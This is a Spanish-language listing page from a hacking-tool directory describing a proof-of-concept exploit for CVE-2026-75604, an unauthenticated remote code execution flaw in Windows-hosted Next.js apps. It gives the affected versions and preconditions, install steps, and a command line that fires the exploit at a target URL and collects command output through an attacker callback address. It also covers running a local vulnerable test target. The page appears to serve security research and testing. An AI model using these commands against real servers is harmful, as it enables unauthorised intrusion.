Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-75604-poc — Prueba de concepto de exploit para CVE-2026-75604, una ejecución remota de código no autenticada en aplicaciones Next.js alojadas en Windows, con ejecución de comandos basada en callbacks y configuración de objetivo local. | Kitploit
Herramientas/GitHubGitHub/rafabd1/cve-2026-75604-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónTroyano de Acceso Remoto
GitHubrafabd1/cve-2026-75604-poc

CVE-2026-75604-poc

Prueba de concepto de exploit para CVE-2026-75604, una ejecución remota de código no autenticada en aplicaciones Next.js alojadas en Windows, con ejecución de comandos basada en callbacks y configuración de objetivo local.

Ver Repositorio
34hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de RCE CVE-2026-75604

Prueba de concepto en Python para CVE-2026-75604, una vulnerabilidad de ejecución remota de comandos sin autenticación en aplicaciones Next.js alojadas en Windows que utilizan tanto Pages Router como App Router sin Cache Components.

Demostración

Prueba de concepto de RCE CVE-2026-75604

Requisitos

  • Next.js >=13.4 <15.5.24 o >=16.0 <16.3.3
  • Servidor Windows nativo
  • Pages Router y App Router sin Cache Components
  • Caché de sistema de archivos predeterminada con una ruta ISR dinámica de Pages y una ruta de App dinámica en caché
  • Una Server Action compatible con cierre (closure-bound)
  • Python 3.9+ y una dirección de callback accesible por el objetivo

Validado con [email protected].

root@kitploit:~
python -m pip install -r requirements.txt

Uso

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

La ruta de la Server Action predeterminada es /. Use --action-field cuando su formulario tenga más de un campo.

Argumentos obligatorios:

  • --target URL: URL base de la aplicación Next.js
  • --callback-ip ADDRESS: dirección IPv4 accesible por el objetivo
  • --pages-cache-path PATH: página ISR dinámica existente de Pages Router
  • --app-cache-path PATH: página dinámica existente de App Router respaldada por la caché del sistema de archivos

Argumentos opcionales:

  • --command COMMAND: comando a ejecutar; el valor predeterminado es whoami
  • --action-path PATH: página de App Router que contiene la Server Action compatible; el valor predeterminado es /
  • --action-field NAME: campo de formulario consumido por la acción; se detecta automáticamente cuando no es ambiguo
  • --callback-port PORT: puerto de callback; el valor predeterminado es 4331
  • --listen-address ADDRESS: dirección local de enlace del callback; el valor predeterminado es 0.0.0.0
  • --timeout SECONDS: tiempo de espera de solicitud y callback; el valor predeterminado es 20
  • --insecure: desactiva la verificación de certificados TLS

Objetivo local

La aplicación opcional target/ fija [email protected] y utiliza el servidor de producción estándar de Next.js:

root@kitploit:~
cd target
npm ci
npm run build
npm start

Ejecute el PoC en otra terminal:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

El objetivo opcional proporciona las rutas requeridas y una Server Action compatible en /.

Aviso legal

Este PoC se proporciona únicamente con fines educativos, investigación de seguridad y pruebas autorizadas. Úselo solo en sistemas que le pertenezcan o para los que tenga permiso explícito de prueba.

Créditos

Crédito a evolutionstorm.

Este PoC fue reconstruido de forma independiente a partir del aviso público y del parche de Next.js.

Descargar herramienta